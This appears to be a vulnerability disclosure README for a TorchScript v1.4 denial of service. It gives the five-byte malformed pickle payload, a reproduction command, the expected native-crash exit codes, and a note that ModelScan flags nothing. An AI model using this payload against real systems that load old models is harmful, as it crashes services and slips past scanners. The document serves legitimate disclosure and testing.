--- tags: - torchscript - pytorch - security - dos - poc license: bsd-3-clause --- # TorchScript v1.4 JIT Unpickler Native DoS PoC This is a benign proof of concept for a TorchScript v1.4 load-time native denial of service. The artifact `artifacts/underflow_appends.pt` is a minimal TorchScript ZIP archive with a malformed `constants.pkl` payload: ```text 80 02 5d 65 2e PROTO 2, EMPTY_LIST, APPENDS, STOP ``` In PyTorch `1.4.0`, `torch.jit.load()` reaches the JIT unpickler and crashes natively on this malformed pickle opcode sequence. Current PyTorch versions tested locally return clean parser errors instead, so this report is specifically scoped to TorchScript v1.4. ## Reproduction Use a Python environment with PyTorch `1.4.0` installed: ```bash python verify_torchscript_v14_dos.py --python /path/to/python-with-torch-1.4.0 ``` Expected output includes a native-crash return code: ```json { "returncode": -11, "native_crash": true } ``` Depending on the shell/platform, SIGSEGV may also appear as exit code `139`; SIGABRT variants appear as `134`. ## Impact An attacker-controlled TorchScript v1.4 model file can crash a process that calls `torch.jit.load()` on the artifact. This is a model-file-carried denial of service. It is not arbitrary code execution and no controlled memory-corruption primitive is claimed. Severity estimate: Medium, if TorchScript v1.4 is in scope. This is weaker if only current PyTorch versions are accepted. ## Evidence Included evidence: - `evidence/torch_1_4_matrix.txt`: PyTorch `1.4.0` crash matrix for malformed `constants.pkl` variants. - `evidence/current_torch_2_8_matrix_nomemlimit.txt`: current-version comparison showing clean parser errors. - `evidence/modelscan_0_8_8_underflow_appends.json`: ModelScan 0.8.8 output, zero issues while scanning `ts/constants.pkl`. ## Hashes ```text bd34cabfd35feb96ced8a63489c5899aa9b17c000ce552406519998d5d3855f1 artifacts/underflow_appends.pt ``` ## Limitation This is intentionally version-scoped. It should be submitted only to programs that accept TorchScript v1.4 or old-version model-format DoS findings.